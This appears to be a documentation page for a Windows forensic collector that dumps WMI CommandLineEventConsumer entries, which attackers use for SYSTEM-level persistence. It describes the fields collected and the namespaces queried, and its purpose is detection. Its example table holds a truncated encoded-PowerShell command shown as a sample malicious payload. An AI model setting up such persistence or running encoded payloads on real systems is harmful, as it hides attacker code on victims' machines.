WMI Command Line
Overview
Section titled “Overview”Evidence: WMI Command Line
Description: Dump WMI Command Line Event Consumers
Category: System
Platform: windows
Short Name: wmicec
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
Section titled “Background”WMI CommandLineEventConsumers execute command-line programs when specific WMI events occur. This persistence mechanism allows attackers to launch executables or scripts with SYSTEM privileges in response to system events.
CommandLine consumers can execute any command-line program, including PowerShell, cmd.exe, or malicious executables.
Data Collected
Section titled “Data Collected”This collector gathers structured data about wmi command line.
WMI Command Line Data
Section titled “WMI Command Line Data”| Field | Description | Example |
|---|---|---|
Name | Consumer name | BadConsumer |
PayloadCommand | Command template to execute | cmd.exe /c powershell.exe -enc … |
PayloadExecutable | Executable path | C:\Windows\System32\cmd.exe |
Collection Method
Section titled “Collection Method”This collector queries WMI for CommandLineEventConsumer instances in multiple namespaces:
ROOT\SubscriptionROOT\DEFAULTROOT\CIMV2
Forensic Value
Section titled “Forensic Value”CommandLine consumers enable command execution persistence. Investigators use this data to detect WMI command-based persistence, identify malicious command payloads, track PowerShell execution via WMI, and detect living-off-the-land persistence.